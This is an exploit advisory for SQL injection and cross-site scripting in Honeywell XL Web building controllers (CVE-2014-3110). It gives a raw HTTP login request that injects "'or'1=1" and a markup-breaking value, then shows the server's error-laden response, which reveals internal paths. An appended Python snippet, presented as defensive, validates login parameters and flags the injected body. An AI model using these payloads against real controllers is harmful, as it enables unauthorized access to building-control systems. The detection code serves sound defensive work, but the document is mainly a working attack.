# Exploit Title: Honeywell XL Web Controller SQLi & XSS
# Date: 2018-05-24
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.honeywell.com
# Version: WebVersion : XL1000C50 EXCEL WEB 52 I/O, XL1000C100 EXCEL WEB 104 I/O, XL1000C500 EXCEL WEB 300 I/O, XL1000C1000 EXCEL WEB 600 I/O, XL1000C50U EXCEL WEB 52 I/O UUKL, XL1000C100U EXCEL WEB 104 I/O UUKL, XL1000C500U EXCEL WEB 300 I/O UUKL, and XL1000C1000U EXCEL WEB 600 I/O UUKL.
# Tested on: Linux
# CVE: CVE-2014-3110

--------------- ---> Proof Of Concept <--------------------------

POST /standard/mainframe.php HTTP/1.1
Cache-Control: no-cache
Referer: http://TargetIP/standard/mainframe.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: Locale=1033
Accept-Encoding: gzip, deflate
Content-Length: 222
Content-Type: application/x-www-form-urlencoded

SessionID=&LocaleID='or'1=1&LoginSessionID=&LoginUserNameMD5="/>
&LoginPasswordMD5=&LoginCommand=&LoginPassword=&
rememberMeCheck=&LoginDevice=192.168.1.12&LoginUserName=Guest

HTTP/1.1 200 OK
Set-Cookie: rememberUser=deleted; expires=Wednesday, 24-May-17 08:54:02 GMT; path=/
Server: Apache/1.3.23 (Unix) PHP/4.4.9
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Transfer-Encoding: chunked
Date: Thu, 24 May 2018 08:54:03 GMT

Warning: xw_get_users() expects parameter 1 to be long, string given in /mnt/mtd6/xlweb/web/standard/login/loginpage.php on line 97

Warning: xml_load_texts_file() expects parameter 2 to be long, string given in /mnt/mtd6/xlweb/web/standard/include/elements.php on line 247
<br /> <b>Notice</b>: Undefined index: HeadTitle in <b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line <b>300</b><br />
 AUM0_MUSEO_LANA.XLWEB_MUSEO_LANA.
Notice: Undefined index: Title in /mnt/mtd6/xlweb/web/standard/login/loginpage.php on line 509

Notice: Undefined index: Login in /mnt/mtd6/xlweb/web/standard/login/loginpage.php on line 596

Notice: Undefined index: AltTitle in /mnt/mtd6/xlweb/web/standard/login/loginpage.php on line 597

Notice: Undefined index: Controller in /mnt/mtd6/xlweb/web/standard/login/loginpage.php on line 605

Notice: Undefined index: UserName in /mnt/mtd6/xlweb/web/standard/login/loginpage.php on line 632

Notice: Undefined index: Password in /mnt/mtd6/xlweb/web/standard/login/loginpage.php on line 689

Notice: Undefined index: RememberMeCheckbox in /mnt/mtd6/xlweb/web/standard/login/loginpage.php on line 720

Notice: Undefined index: LoginButton in /mnt/mtd6/xlweb/web/standard/login/loginpage.php on line 750

Notice: Undefined index: AltTitle in /mnt/mtd6/xlweb/web/standard/login/loginpage.php on line 751
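
# Added example (not part of the original advisory and not vendor code): a strict
# format check for the login POST body shown above, usable in a reverse proxy or for
# log triage. The accepted formats, the function name and the benign sample are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Assumed formats (not documented on the page):
#  - LocaleID is a short decimal integer: the PHP warning in the response says
#    a long is expected, and the request cookie carries Locale=1033.
#  - The *MD5 fields are empty or exactly 32 hex digits, going by their names.
RULES = {
    "LocaleID": re.compile(r"\d{1,5}"),
    "LoginUserNameMD5": re.compile(r"[0-9a-fA-F]{32}"),
    "LoginPasswordMD5": re.compile(r"[0-9a-fA-F]{32}"),
}

# Request body from the proof of concept above, with the line wraps removed.
POC_BODY = (
    "SessionID=&LocaleID='or'1=1&LoginSessionID=&LoginUserNameMD5=\"/>"
    "&LoginPasswordMD5=&LoginCommand=&LoginPassword=&rememberMeCheck="
    "&LoginDevice=192.168.1.12&LoginUserName=Guest"
)

# Constructed benign body for comparison (not taken from the page).
BENIGN_BODY = (
    "SessionID=&LocaleID=1033&LoginSessionID=&LoginUserNameMD5="
    "&LoginPasswordMD5=&LoginCommand=&LoginPassword=&rememberMeCheck="
    "&LoginDevice=192.168.1.12&LoginUserName=Guest"
)


def check_login_body(body):
    """Return the names of parameters whose values break the assumed format."""
    bad = []
    # keep_blank_values: the login form legitimately posts empty fields.
    # parse_qsl yields every occurrence, so a duplicated parameter that
    # carries a bad value in its second copy is still reported.
    for name, value in parse_qsl(body, keep_blank_values=True):
        rule = RULES.get(name)
        if rule is not None and value and not rule.fullmatch(value):
            bad.append(name)
    return bad


if __name__ == "__main__":
    print("PoC body:   ", check_login_body(POC_BODY))
    print("benign body:", check_login_body(BENIGN_BODY))
```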